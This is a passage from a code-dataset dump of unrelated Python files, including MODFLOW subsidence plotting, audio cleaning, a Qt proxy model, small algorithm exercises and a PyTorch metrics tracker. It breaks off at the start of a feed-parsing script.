color=\"brown\", alpha=0.5)\n styles.add_annotation(\n ax=ax,\n text=\"Delay interbed\",\n xy=(1.5, -510.0),\n xytext=(1.6, -300),\n bold=False,\n italic=False,\n fontsize=9,\n ha=\"center\",\n va=\"center\",\n zorder=100,\n arrowprops=arrow_props,\n )\n mc.plot_grid(color=\"0.5\", lw=0.5, zorder=100)\n\n ax.set_xlim(0, 3)\n ax.set_ylabel(\"Elevation, in meters\")\n ax.set_xlabel(\"x-coordinate, in meters\")\n styles.remove_edge_ticks(ax)\n\n plt.tight_layout()\n\n if plot_show:\n plt.show()\n if plot_save:\n fpth = os.path.join(\"..\", \"figures\", f\"{sim_name}-grid.png\")\n if not silent:\n print(f\"saving...'{fpth}'\")\n fig.savefig(fpth)\n\n\ndef plot_head_based(sim, silent=True):\n with styles.USGSPlot() as fs:\n name = sim.name\n\n # get csub observations\n ws = sim.simulation_data.mfpath.get_sim_path()\n s = flopy.mf6.MFSimulation().load(sim_ws=ws, verbosity_level=0)\n gwf = s.get_model(name)\n cobs = gwf.csub.output.obs().data\n\n # calculate the compaction analytically\n ac = []\n nz = 100\n thick = parameters[name][\"bed_thickness\"][0]\n kv = parameters[name][\"kv\"][0]\n dhalf = thick * 0.5\n az = np.linspace(-dhalf, dhalf, num=nz)\n dz = az[1] - az[0]\n for tt in cobs[\"totim\"]:\n c = 0.0\n for jdx, zz in enumerate(az):\n f = 1.0\n if jdx == 0 or jdx == nz - 1:\n f = 0.5\n h = analytical_solution(zz, tt, ssk=skv, vk=kv, n=200, dh=1.0)\n c += h * skv * f * dz\n ac.append(c)\n ac = np.array(ac)\n\n # calculate normalized simulation time\n tpct = cobs[\"totim\"] * 100 / tau0\n\n # plot the results\n fig = plt.figure(figsize=figure_size)\n gs = mpl.gridspec.GridSpec(1, 2, figure=fig)\n\n idx = 0\n ax = fig.add_subplot(gs[idx])\n ax.plot(\n tpct,\n 100 * ac / skv,\n marker=\".\",\n lw=0,\n ms=3,\n color=\"red\",\n label=\"Analytical\",\n )\n ax.plot(\n tpct,\n 100 * cobs[\"TCOMP\"] / skv,\n label=\"Simulated\",\n color=\"black\",\n lw=1,\n zorder=100,\n )\n leg = styles.graph_legend(ax, loc=\"lower right\")\n ax.set_xticks(np.arange(0, 110, 10))\n ax.set_yticks(np.arange(0, 110, 10))\n ax.set_xlabel(\"Percent of time constant\")\n ax.set_ylabel(\"Compaction, in percent of ultimate value\")\n ax.set_xlim(0, 100)\n ax.set_ylim(0, 100)\n styles.heading(ax, letter=\"A\")\n styles.remove_edge_ticks(ax)\n\n idx += 1\n ax = fig.add_subplot(gs[idx])\n ax.plot(tpct, 100 * (ac - cobs[\"TCOMP\"]) / skv, lw=1, ls=\":\", color=\"black\")\n ax.set_xticks(np.arange(0, 110, 10))\n ax.set_yticks(np.arange(0, 2.2, 0.2))\n ax.set_xlabel(\"Percent of time constant\")\n ax.set_ylabel(\n \"Analytical minus simulated subsidence,\\nin percent of ultimate value\"\n )\n ax.set_xlim(0, 100)\n ax.set_ylim(0, 2)\n styles.heading(ax, letter=\"B\")\n styles.remove_edge_ticks(ax)\n\n plt.tight_layout()\n\n if plot_show:\n plt.show()\n if plot_save:\n fpth = os.path.join(\"..\", \"figures\", f\"{name}-01.png\")\n if not silent:\n print(f\"saving...'{fpth}'\")\n fig.savefig(fpth)\n\n\ndef plot_effstress(sim, silent=True):\n verbose = not silent\n with styles.USGSPlot() as fs:\n name = sim.name\n\n # get effective stress csub observations\n gwf = sim.get_model(name)\n cobs = gwf.csub.output.obs().data\n\n # get head-based csub observations\n name0 = name.replace(\"-p02b\", \"-p02a\")\n ws0 = os.path.join(workspace, name0)\n sim0 = flopy.mf6.MFSimulation().load(sim_ws=ws0, verbosity_level=0)\n gwf0 = sim0.get_model(name0)\n cobs0 = gwf0.csub.output.obs().data\n\n # calculate normalized simulation time\n tpct = cobs[\"totim\"] * 100 / tau0\n\n # plot the results\n fig = plt.figure(figsize=figure_size)\n gs = mpl.gridspec.GridSpec(1, 2, figure=fig)\n\n idx = 0\n ax = fig.add_subplot(gs[idx])\n ax.plot(\n tpct,\n 100 * cobs0[\"TCOMP\"] / skv,\n lw=0,\n marker=\".\",\n ms=3,\n color=\"#238A8DFF\",\n label=\"Head-based\",\n )\n ax.plot(\n tpct,\n 100 * cobs[\"TCOMP\"] / skv,\n lw=0.75,\n label=\"Effective stress-based\",\n color=\"black\",\n zorder=100,\n )\n leg = styles.graph_legend(ax, loc=\"lower right\")\n ax.set_xticks(np.arange(0, 110, 10))\n ax.set_yticks(np.arange(0, 110, 10))\n ax.set_xlabel(\"Percent of time constant\")\n ax.set_ylabel(\"Compaction, in percent of ultimate value\")\n ax.set_xlim(0, 100)\n ax.set_ylim(0, 100)\n styles.heading(ax, letter=\"A\")\n styles.remove_edge_ticks(ax)\n\n idx += 1\n ax = fig.add_subplot(gs[idx])\n ax.plot(\n tpct,\n 100 * (cobs0[\"TCOMP\"] - cobs[\"TCOMP\"]) / skv,\n lw=1,\n ls=\":\",\n color=\"black\",\n )\n ax.set_xticks(np.arange(0, 110, 10))\n ax.set_xlabel(\"Percent of time constant\")\n ax.set_ylabel(\n \"Head-based minus effective stress-based\\nsubsidence, in percent of ultimate value\"\n )\n ax.set_xlim(0, 100)\n styles.heading(ax, letter=\"B\")\n styles.remove_edge_ticks(ax)\n\n plt.tight_layout()\n\n if plot_show:\n plt.show()\n if plot_save:\n fpth = os.path.join(\"..\", \"figures\", f\"{name}-01.png\")\n if not silent:\n print(f\"saving...'{fpth}'\")\n fig.savefig(fpth)\n\n\ndef get_subdirs(sim):\n \"\"\"Get subdirectory names\"\"\"\n name = sim.name\n # get the subdirectory names\n pth = os.path.join(workspace, name)\n hb_dirs = [\n name\n for name in sorted(os.listdir(pth))\n if os.path.isdir(os.path.join(pth, name)) and name.startswith(\"hb-\")\n ]\n es_dirs = [\n name\n for name in sorted(os.listdir(pth))\n if os.path.isdir(os.path.join(pth, name)) and name.startswith(\"es-\")\n ]\n return hb_dirs, es_dirs\n\n\ndef fill_heads(rec_arr, ndcells):\n \"\"\"Process interbed heads\"\"\"\n arr = np.zeros((rec_arr.shape[0], ndcells), dtype=float)\n for i in range(100):\n for j in range(ndcells):\n name = f\"H{j + 1:04d}\"\n arr[i, j] = rec_arr[name][i]\n return arr\n\n\ndef plot_comp_q_comparison(sim, silent=True):\n \"\"\"Plot the results for multiple interbed thicknesses\"\"\"\n with styles.USGSPlot():\n name = sim.name\n thicknesses = parameters[name][\"bed_thickness\"]\n\n # get the subdirectory names\n hb_dirs, es_dirs = get_subdirs(sim)\n\n # setup the figure\n fig = plt.figure(figsize=figure_size)\n gs = mpl.gridspec.GridSpec(1, 2, figure=fig)\n\n # set color\n cmap = plt.get_cmap(\"viridis\")\n cNorm = mpl.colors.Normalize(vmin=0, vmax=6)\n scalarMap = mpl.cm.ScalarMappable(norm=cNorm, cmap=cmap)\n\n axes = []\n for idx in range(2):\n ax = fig.add_subplot(gs[idx])\n if idx == 0:\n ax.set_yticks(np.arange(-0.40, 0.1, 0.05))\n ax.set_ylim(-0.40, 0)\n ax.set_xlim(0, 100)\n ylabel = (\n \"Head-based minus effective stress-based\\nsubsidence, \"\n + \"in % of ultimate value\"\n )\n else:\n ax.set_ylim(0, 8)\n ax.set_xlim(0, 100)\n ylabel = (\n \"Top minus bottom interbed effective stress-\\nbased \"\n + \"rate, in % of head-based drainage rate\"\n )\n ax.set_xlabel(\"Percent of time constant\")\n ax.set_ylabel(ylabel)\n styles.heading(ax, letter=chr(ord(\"A\") + idx))\n axes.append(ax)\n plt.subplots_adjust(wspace=0.36)\n\n for idx, (hb_dir, es_dir) in enumerate(zip(hb_dirs, es_dirs)):\n sim_ws = os.path.join(workspace, name, hb_dir)\n s = flopy.mf6.MFSimulation().load(sim_ws=sim_ws, verbosity_level=0)\n g = s.get_model(name)\n hb_obs = g.csub.output.obs().data\n\n ws0 = os.path.join(workspace, name, es_dir)\n s0 = flopy.mf6.MFSimulation().load(sim_ws=ws0, verbosity_level=0)\n g0 = s0.get_model(name)\n es_obs = g0.csub.output.obs().data\n\n # calculate normalized simulation time\n tpct = hb_obs[\"totim\"] * 100 / tau0\n\n thickness = thicknesses[idx]\n if idx == 0:\n color = \"black\"\n else:\n color = scalarMap.to_rgba(idx - 1)\n label = f\"Thickness = {int(thickness):>3d} m\"\n\n v = 100.0 * (hb_obs[\"TCOMP\"] - es_obs[\"TCOMP\"]) / (skv * thickness)\n ax = axes[0]\n ax.plot(tpct, v, color=color, lw=0.75, label=label)\n\n denom = hb_obs[\"QTOP\"] + hb_obs[\"QBOT\"]\n v = 100 * (es_obs[\"QTOP\"] - es_obs[\"QBOT\"]) / denom\n ax = axes[1]\n ax.plot(tpct, v, color=color, lw=0.75, label=label)\n\n # legend\n ax = axes[-1]\n leg = styles.graph_legend(ax, loc=\"upper right\")\n\n if plot_show:\n plt.show()\n if plot_save:\n fpth = os.path.join(\"..\", \"figures\", f\"{name}-01.png\")\n if not silent:\n print(f\"saving...'{fpth}'\")\n fig.savefig(fpth)\n\n\ndef plot_head_comparison(sim, silent=True):\n \"\"\"Plot the interbed head results for multiple interbed thicknesses\"\"\"\n with styles.USGSPlot():\n name = sim.name\n ndcells = parameters[name][\"ndelaycells\"]\n thicknesses = parameters[name][\"bed_thickness\"]\n\n # get the subdirectory names\n hb_dirs, es_dirs = get_subdirs(sim)\n\n # setup the figure\n fig = plt.figure(figsize=figure_size)\n fig.subplots_adjust(left=0.06, right=0.95, top=0.95, bottom=0.15, wspace=0.1)\n gs = mpl.gridspec.GridSpec(1, 6, figure=fig)\n z = np.linspace(0, 1, ndcells)\n yticks = np.arange(0, 1.1, 0.1)\n\n # set color\n cmap = plt.get_cmap(\"viridis\")\n cNorm = mpl.colors.Normalize(vmin=0, vmax=6)\n scalarMap = mpl.cm.ScalarMappable(norm=cNorm, cmap=cmap)\n\n # percentages to evaluate\n pct_vals = (\n 1,\n 5,\n 10,\n 50,\n 100,\n )\n\n axes = []\n for idx in range(6):\n ax = fig.add_subplot(gs[idx])\n ax.set_ylim(1, 0)\n ax.set_xlim(-5, 5)\n if idx < 5:\n styles.heading(ax, letter=chr(ord(\"A\") + idx))\n ax.set_yticks(yticks)\n styles.remove_edge_ticks(ax)\n text = r\"$\\frac{t}{\\tau_0}$ = \" + \"{}\".format(pct_vals[idx] / 100.0)\n ax.text(\n 0.25,\n 0.01,\n text,\n ha=\"center\",\n va=\"bottom\",\n transform=ax.transAxes,\n fontsize=8,\n )\n else:\n ax.set_xticks([])\n ax.set_yticks([])\n\n if idx == 0:\n ax.set_ylabel(\"Interbed position, relative to interbed thickness\")\n else:\n if idx == 2:\n text = (\n \"Difference in head-based and effective stress-based\"\n + \"\\ninterbed heads, in percent of head-based interbed heads\"\n )\n ax.set_xlabel(text)\n ax.set_yticklabels([])\n axes.append(ax)\n\n for idx, (hb_dir, es_dir) in enumerate(zip(hb_dirs, es_dirs)):\n sim_ws = os.path.join(workspace, name, hb_dir)\n s = flopy.mf6.MFSimulation().load(sim_ws=sim_ws, verbosity_level=0)\n g = s.get_model(name)\n hb_obs = g.csub.output.obs().data\n hb_arr = fill_heads(hb_obs, ndcells)\n\n ws0 = os.path.join(workspace, name, es_dir)\n s0 = flopy.mf6.MFSimulation().load(sim_ws=ws0, verbosity_level=0)\n g0 = s0.get_model(name)\n es_obs = g0.csub.output.obs().data\n es_arr = fill_heads(es_obs, ndcells)\n #\n # pth = os.path.join(ws, name, hb_dir, \"{}.csub.obs.csv\".format(name))\n # hb_obs = np.genfromtxt(pth, names=True, delimiter=\",\")\n # hb_arr = fill_heads(hb_obs, ndcells)\n #\n # pth = os.path.join(ws, name, es_dir, \"{}.csub.obs.csv\".format(name))\n # es_obs = np.genfromtxt(pth, names=True, delimiter=\",\")\n # es_arr = fill_heads(es_obs, ndcells)\n\n # calculate normalized simulation time\n tpct = hb_obs[\"totim\"] * 100 / tau0\n\n # calculate location closest to 1, 5, 10, 50, and 100 percent of time constant\n locs = {}\n for i in pct_vals:\n for jdx, t in enumerate(tpct):\n if t <= i:\n locs[i] = jdx\n\n for jdx, (key, ivalue) in enumerate(locs.items()):\n # add data to the subplot\n ax = axes[jdx]\n if idx == 0:\n color = \"black\"\n else:\n color = scalarMap.to_rgba(idx - 1)\n hhb = hb_arr[ivalue, :]\n hes = es_arr[ivalue, :]\n v = 100.0 * (hhb - hes) / hhb\n ax.plot(v, z, lw=0.75, color=color)\n\n # legend\n ax = axes[-1]\n ax.set_ylim(1, 0)\n ax.set_xlim(-5, 5)\n ax.spines[\"top\"].set_color(\"none\")\n ax.spines[\"bottom\"].set_color(\"none\")\n ax.spines[\"left\"].set_color(\"none\")\n ax.spines[\"right\"].set_color(\"none\")\n ax.patch.set_alpha(0.0)\n for ic, b in enumerate(thicknesses):\n if ic == 0:\n color = \"black\"\n else:\n color = scalarMap.to_rgba(ic - 1)\n label = f\"Thickness = {int(b):>3d} m\"\n ax.plot([-1, -1], [-1, -1], lw=0.75, color=color, label=label)\n\n leg = styles.graph_legend(ax, loc=\"center\", bbox_to_anchor=(0.64, 0.5))\n\n if plot_show:\n plt.show()\n if plot_save:\n fpth = os.path.join(\"..\", \"figures\", f\"{name}-02.png\")\n if not silent:\n print(f\"saving...'{fpth}'\")\n fig.savefig(fpth)\n\n\ndef plot_results(sim, silent=True):\n name = sim.name\n if name.endswith(\"a\"):\n plot_grid(sim, silent=silent)\n plot_head_based(sim, silent=silent)\n elif name.endswith(\"b\"):\n plot_effstress(sim, silent=silent)\n elif name.endswith(\"c\"):\n plot_comp_q_comparison(sim, silent=silent)\n plot_head_comparison(sim, silent=silent)\n\n\n# -\n\n# ### Running the example\n#\n# Define a function to run the example scenarios, then plot results.\n\n\n# +\ndef scenarios(idx, silent=True):\n key = list(parameters.keys())[idx]\n interbed_thickness = parameters[key][\"bed_thickness\"]\n interbed_kv = parameters[key][\"kv\"]\n params = parameters[key].copy()\n if len(interbed_thickness) == 1:\n params[\"bed_thickness\"] = interbed_thickness[0]\n params[\"kv\"] = interbed_kv[0]\n\n sim = build_models(key, **params)\n if write:\n write_models(sim, silent=silent)\n if run:\n run_models(sim, silent=silent)\n else:\n for b, kv in zip(interbed_thickness, interbed_kv):\n for head_based in (\n True,\n False,\n ):\n if head_based:\n subdir_name = \"hb-\"\n else:\n subdir_name = \"es-\"\n subdir_name += f\"{int(b):03d}\"\n params[\"head_based\"] = head_based\n params[\"bed_thickness\"] = b\n params[\"kv\"] = kv\n\n sim = build_models(key, subdir_name=subdir_name, **params)\n if write:\n write_models(sim, silent=silent)\n if run:\n run_models(sim, silent=silent)\n if plot:\n plot_results(sim, silent=silent)\n\n\n# -\n\n\n# Run and plot the head based solution.\n\nscenarios(0)\n\n# Run and plot the effective stress solution.\n\nscenarios(1)\n\n# Run and plot the head based for multiple interbed thicknesses.\n\nscenarios(2)\n","repo_name":"langevin-usgs/modflow6-examples","sub_path":"scripts/ex-gwf-csub-p02.py","file_name":"ex-gwf-csub-p02.py","file_ext":"py","file_size_in_byte":25126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"32658510673","text":"import os\nimport re\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nimport pandas as pd\nimport torchaudio\nimport argparse\n\nfrom tqdm import tqdm\nimport random\n\nimport librosa\nfrom librosa.core import resample\nfrom scipy.io import wavfile\n\nfrom helper.audio_cleaner import clean\n\n\ndef read_file(path):\n wav, sr = torchaudio.load(path)\n return wav, sr\n\ndef save_sample(wavetensor, rate, target_dir, fn, ix):\n fn = fn.split('.wav')[0]\n if (ix > 0):\n dst_path = os.path.join(target_dir.split('.')[0], fn+'_{}.wav'.format(str(ix)))\n else:\n dst_path = os.path.join(target_dir.split('.')[0], fn+'.wav')\n torchaudio.save(dst_path, wavetensor, rate)\n\n\ndef check_dir(path):\n if os.path.exists(path) is False:\n os.mkdir(path)\n\n\ndef save_sample_librosa(waveform, rate, target_dir, fn, ix):\n fn = fn.split('.wav')[0]\n if (ix > 0):\n dst_path = os.path.join(target_dir.split('.')[0], fn+'_{}.wav'.format(str(ix)))\n else:\n dst_path = os.path.join(target_dir.split('.')[0], fn+'.wav')\n if os.path.exists(dst_path):\n return\n wavfile.write(dst_path, rate, waveform)\n\ndef prepare(args):\n src_root = args.src_root\n dst_root = args.dst_root\n tl = args.tl\n\n check_dir(dst_root)\n classes = os.listdir(src_root)\n\n for _cls in classes:\n target_dir = os.path.join(dst_root, _cls)\n check_dir(target_dir)\n\n for sub_dir in os.listdir(os.path.join(src_root, _cls)):\n src_dir = os.path.join(src_root, _cls, sub_dir)\n\n for fn in tqdm(os.listdir(src_dir)):\n src_fn = os.path.join(src_dir, fn)\n\n if args.mode == 'sox' :\n waveform, sample_rate = read_file(src_fn)\n # Torch Vad only trim the end of the signal \n waveform_reversed, sample_rate = torchaudio.sox_effects.apply_effects_tensor(waveform, sample_rate, [[\"reverse\"]])\n vad = torchaudio.transforms.Vad(sample_rate=sample_rate, trigger_level=tl)\n waveform_reversed_front_trim = vad(waveform_reversed)\n waveform_end_trim, sample_rate = torchaudio.sox_effects.apply_effects_tensor(\n waveform_reversed_front_trim, sample_rate, [[\"reverse\"]]\n )\n waveform = vad(waveform_end_trim)\n\n resampler = torchaudio.transforms.Resample(sample_rate, args.sr)\n resampler.to('cpu')\n waveform = resampler(waveform)\n\n save_sample(waveform, args.sr, target_dir, fn, 0)\n else:\n waveform, sample_rate = librosa.load(src_fn, sr = args.sr)\n if args.mode == 'librosa' :\n clean_wav, index = librosa.effects.trim(y=waveform, top_db=args.threshold, ref = 1)\n else:\n clean_wav = clean(y=waveform, sr = sample_rate , intensity = 1)\n if clean_wav.any():\n if clean_wav.shape[0] < args.sr:\n clean_wav = resample(clean_wav, orig_sr = sample_rate, target_sr = args.sr)\n save_sample_librosa(clean_wav, args.sr, target_dir, fn, 0)\n else:\n # We try a higher intensity\n clean_wav = clean(y=clean_wav, sr = sample_rate , intensity = 3)\n if clean_wav.any():\n clean_wav = resample(clean_wav, orig_sr = sample_rate, target_sr = args.sr)\n save_sample_librosa(clean_wav, args.sr, target_dir, fn, 0)\n\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Cleaning audio data')\n parser.add_argument('--mode', type=str, default='librosa',\n help='vad, sox, or librosa')\n parser.add_argument('--src_root', type=str, default='data/raw',\n help='directory of audio files in total duration')\n parser.add_argument('--dst_root', type=str, default='data/cleaned',\n help='directory to put audio files split by delta_time')\n parser.add_argument('--sr', type=int, default=16000, #default=16000\n help='rate to downsample audio')\n\n parser.add_argument('--tl', type=str, default=7.5, #default=7.5\n help='trigger level for torch vad')\n parser.add_argument('--threshold', type=str, default=55, \n help='threshold top db for librosa trim')\n args, _ = parser.parse_known_args()\n\n prepare(args)\n\n","repo_name":"hedeshy/CNVVE","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"32595653444","text":"from __future__ import annotations\n\nfrom prettyqt import core\nfrom prettyqt.utils import get_repr\n\n\nclass RangeFilterProxyModel(core.SortFilterProxyModel):\n ID = \"range_filter\"\n\n def __init__(self, min_value=None, max_value=None, **kwargs):\n self._min_value = min_value\n self._max_value = max_value\n super().__init__(**kwargs)\n\n def __repr__(self):\n return get_repr(self, self.get_range)\n\n def filterAcceptsRow(self, source_row: int, parent: core.ModelIndex) -> bool:\n column = self.filterKeyColumn()\n role = self.filterRole()\n source_model = self.sourceModel()\n idx = source_model.index(source_row, column, parent)\n value = source_model.data(idx, role)\n if self._min_value is not None and value < self._min_value:\n return False\n return self._max_value is None or value <= self._max_value\n\n def set_min_value(self, value: float | int | None):\n self._min_value = value\n self.invalidateRowsFilter()\n\n def get_min_value(self) -> float | int:\n if self._min_value is None:\n return -float(\"inf\")\n return self._min_value\n\n def set_max_value(self, value: float | int):\n self._max_value = value\n self.invalidateRowsFilter()\n\n def get_max_value(self) -> float | int:\n if self._max_value is None:\n return float(\"inf\")\n return self._max_value\n\n def set_range(self, rng: tuple[float | int | None, float | int | None]):\n self._min_value, self._max_value = rng\n self.invalidateRowsFilter()\n\n def get_range(self) -> tuple[float | int | None, float | int | None]:\n return (self._min_value, self._max_value)\n\n min_value = core.Property(\n float,\n get_min_value,\n set_min_value,\n doc=\"Minimum allowed value\",\n )\n max_value = core.Property(\n float,\n get_max_value,\n set_max_value,\n doc=\"Maximum allowed value\",\n )\n\n\nif __name__ == \"__main__\":\n from prettyqt import constants, widgets\n\n app = widgets.app()\n proxy = RangeFilterProxyModel(True, filter_role=constants.CHECKSTATE_ROLE)\n","repo_name":"phil65/PrettyQt","sub_path":"prettyqt/itemmodels/proxies/rangefilterproxymodel.py","file_name":"rangefilterproxymodel.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"17646917075","text":"# Find a pair with the given difference https://www.geeksforgeeks.org/find-a-pair-with-the-given-difference/\n\ndef findPair(arr,n):\n \n size = len(arr)\n \n # Initialize positions of two elements\n i,j = 0,1\n \n # Search for a pair\n while i < size and j < size:\n \n if i != j and arr[j]-arr[i] == n:\n print(f\"Pair found: ({arr[i]} , {arr[j]})\")\n return True\n \n elif arr[j] - arr[i] < n:\n j+=1\n else:\n i+=1\n print (\"No pair found\")\n return False\n\nfindPair([1, 8, 30, 40, 100], 60) ","repo_name":"radomirbrkovic/algorithms","sub_path":"search/exercises/find-a-pair-with-the-given-difference.py","file_name":"find-a-pair-with-the-given-difference.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30066501817","text":"\"\"\"\r\n\n\nWrite a function that makes the **first number as large as possible** by\nswapping out its digits for digits in the second number.\n\nTo illustrate:\n\n max_possible(9328, 456) ➞ 9658\n # 9658 is the largest possible number built from swaps from 456.\n # 3 replaced with 6 and 2 replaced with 5.\n\n### Examples\n\n max_possible(523, 76) ➞ 763\n \n max_possible(9132, 5564) ➞ 9655\n \n max_possible(8732, 91255) ➞ 9755\n\n### Notes\n\n * Each digit in the second number can only be used once.\n * Zero to all digits in the second number may be used.\n\n\"\"\"\r\n\ndef max_possible(n1, n2):\n K1=[int(i) for i in str(n1)]\n K2=[int(i) for i in str(n2)]\n for i,n in enumerate(K1):\n if len(K2)<=0:\n break\n if n < max(K2):\n K1[i] = max(K2)\n K2.remove(K1[i])\n return int(''.join([str(i) for i in K1]))\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"FeNrBCG9rSdNeJTuX_18.py","file_name":"FeNrBCG9rSdNeJTuX_18.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14981686597","text":"import torch\nimport pandas as pd\nfrom os.path import join\n\nclass Metric_tracker():\n def __init__(self, split, class_to_name, log_dir, set_k=None, hierarchical=False, fine_to_coarse=None):\n self.split = split\n self.class_to_name = class_to_name\n self.log_dir = log_dir\n self.set_k = set_k\n self.hierarchical = hierarchical\n self.fine_to_coarse = fine_to_coarse\n if self.set_k is not None:\n if 1 not in self.set_k:\n self.set_k.append(1)\n self.set_k.sort()\n else:\n self.set_k = [1,3,5,10]\n self.reset()\n\n def reset(self):\n self.topk_tp = {}\n self.top1_fp = torch.zeros(len(self.class_to_name), dtype=torch.int)\n self.samples_per_class = torch.zeros(len(self.class_to_name), dtype=torch.int)\n for k in self.set_k:\n self.topk_tp[k] = torch.zeros(len(self.class_to_name), dtype=torch.int)\n self.losses = []\n if self.fine_to_coarse is not None:\n self.coarse_tp = torch.zeros(len(set(self.fine_to_coarse.values())), dtype=torch.int)\n else:\n self.coarse_tp = torch.zeros(1, dtype=torch.int)\n \n def update_topk_TruePositives(self, y_true, y_pred):\n predicted_classes = torch.argsort(y_pred, axis=-1, descending=True)\n for k in self.set_k:\n for gt, pred in zip(y_true, predicted_classes):\n if k == 1: #At first iteration.\n self.samples_per_class[gt.item()]+=1 #counting class item.\n top_k = pred[:k]\n self.topk_tp[k][gt.item()]+=torch.sum(gt == top_k).item()\n self.top1_fp[gt.item()]+= torch.sum(gt != top_k).item()\n else:\n top_k = pred[:k]\n self.topk_tp[k][gt.item()]+=torch.sum(gt == top_k).item()\n\n def update_coarse_TruePositives(self, y_true, y_pred):\n predicted_classes = torch.argsort(y_pred, axis=-1, descending=True)\n for gt, pred in zip(y_true, predicted_classes):\n pred_coarse_id = self.fine_to_coarse[str(pred[0].item())]\n gt_coarse_id = self.fine_to_coarse[str(gt.item())]\n self.coarse_tp[gt_coarse_id]+=(pred_coarse_id == gt_coarse_id)\n\n def update(self, loss, y_true, y_pred):\n if self.hierarchical:\n y_true = y_true[1].cpu()\n y_pred = y_pred[1].cpu() \n else:\n y_true = y_true.cpu()\n y_pred = y_pred.cpu()\n self.update_topk_TruePositives(y_true, y_pred)\n \n if self.fine_to_coarse is not None:\n self.update_coarse_TruePositives(y_true, y_pred)\n \n self.losses.append(loss)\n\n def result(self):\n samples_per_class, zero_classes = self.cal_samples()\n precisions = self.cal_precision(samples_per_class)\n recalls = self.cal_recall(samples_per_class)\n topk_acc = self.cal_topk_accuracy(samples_per_class) \n epoch_loss = self.cal_epoch_loss()\n coarse_acc = self.cal_coarse_accuracy(samples_per_class)\n return {\"samples_per_class\":samples_per_class,\n \"zero_classes\":zero_classes,\n \"precisions\": precisions,\n \"recalls\": recalls,\n \"topk_acc\": topk_acc,\n \"coarse_acc\": coarse_acc,\n \"epoch_loss\": epoch_loss}\n\n def to_writer(self, writer, epoch, optimizer=None):\n result = self.result()\n writer.add_scalar(f\"Loss/{self.split}\", result[\"epoch_loss\"].item(), epoch)\n writer.add_scalar(f\"acc/{self.split}\", result[\"topk_acc\"][1].item(), epoch)\n writer.add_scalar(f\"balanced_acc/{self.split}\", torch.mean(result[\"recalls\"]).item(), epoch)\n writer.add_scalar(f\"coarse_acc/{self.split}\", result[\"coarse_acc\"].item(), epoch)\n for k in self.set_k:\n writer.add_scalar(f\"top-{k} acc/{self.split}\", result[\"topk_acc\"][k].item(), epoch)\n if optimizer is not None:\n writer.add_scalar(f\"learning_rate/{self.split}\", optimizer.param_groups[0][\"lr\"], epoch)\n\n def to_csv(self, path):\n result = self.result()\n \n df1 = pd.DataFrame({\"name\" : list(self.class_to_name.values()), \n \"samples_per_class\" : result[\"samples_per_class\"].numpy(),\n \"precisions\" : result[\"precisions\"].numpy(),\n \"recalls\" : result[\"recalls\"].numpy()})\n df2 = pd.DataFrame({\"name\" : [k for k in self.set_k]+[\"balanced_acc\", \"coarse_acc\", \"loss\"], \n \"metric\" : [result[\"topk_acc\"][k] for k in self.set_k]+[torch.mean(result[\"recalls\"]).item(), result[\"coarse_acc\"].item(), result[\"epoch_loss\"].item()]})\n df1.to_csv(join(path, f\"categorical_metrics_{self.split}.csv\"))\n df2.to_csv(join(path, f\"overall_metric_{self.split}.csv\"))\n\n\n def cal_samples(self):\n #If there is no samples in a class, record it at zero_classes\n #num_samples should be larger than 0 to avoid divided by zero when you calculate metrics.\n samples_per_class = self.samples_per_class\n zero_classes = torch.where(samples_per_class==0)[0] #Detect no sample classes.\n samples_per_class = torch.where(samples_per_class==0, torch.tensor(1,dtype=torch.int), samples_per_class)\n return samples_per_class, zero_classes\n\n def cal_precision(self, samples_per_class):\n return torch.div(self.topk_tp[1], self.topk_tp[1]+self.top1_fp)\n\n def cal_recall(self, samples_per_class):\n return torch.div(self.topk_tp[1], samples_per_class)\n\n def cal_coarse_accuracy(self, samples_per_class):\n coarse_acc = torch.div( torch.sum(self.coarse_tp), torch.sum(samples_per_class))\n return coarse_acc\n \n def cal_topk_accuracy(self, samples_per_class):\n topk_acc = {}\n for k in self.set_k:\n topk_acc[k] = torch.div( torch.sum(self.topk_tp[k]), torch.sum(samples_per_class))\n return topk_acc\n\n def cal_epoch_loss(self):\n return torch.mean(torch.stack(self.losses))","repo_name":"hukim1112/uos_plantclassification","sub_path":"utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"15170586562","text":"'''Note: Try to solve this task in O(n) time using O(1) additional space, where n is the number of elements in the list, since this is what you'll be asked to do during an interview.\n\nGiven a singly linked list of integers l and an integer k, remove all elements from list l that have a value equal to k.\n\nExample\n\nFor l = [3, 1, 2, 3, 4, 5] and k = 3, the output should be\nremoveKFromList(l, k) = [1, 2, 4, 5];\nFor l = [1, 2, 3, 4, 5, 6, 7] and k = 10, the output should be\nremoveKFromList(l, k) = [1, 2, 3, 4, 5, 6, 7].\n'''\n\n# Definition for singly-linked list:\n# class ListNode(object):\n# def __init__(self, x):\n# self.value = x\n# self.next = None\n#\ndef removeKFromList(l, k):\n if(l == None):\n return l\n while(l != None and l.value == k):\n l = l.next \n temp = l\n while(temp != None and temp.next != None):\n if(temp.next.value == k):\n temp.next = temp.next.next \n else:\n temp = temp.next\n return l\n \n","repo_name":"shaduk/algorithms-datastructures","sub_path":"CodeFights/RemoveKelement.py","file_name":"RemoveKelement.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"29723793302","text":"#!/usr/bin/python3\nimport feedparser\nimport time\nimport urllib\n\nimport socket\nimport socks \n#import python_postgresql.insert_jobs_list\nfrom python_postgresql import insert_jobs_list\n\n#pip install feedparser\n#pip install pysocks\n\n\nr = 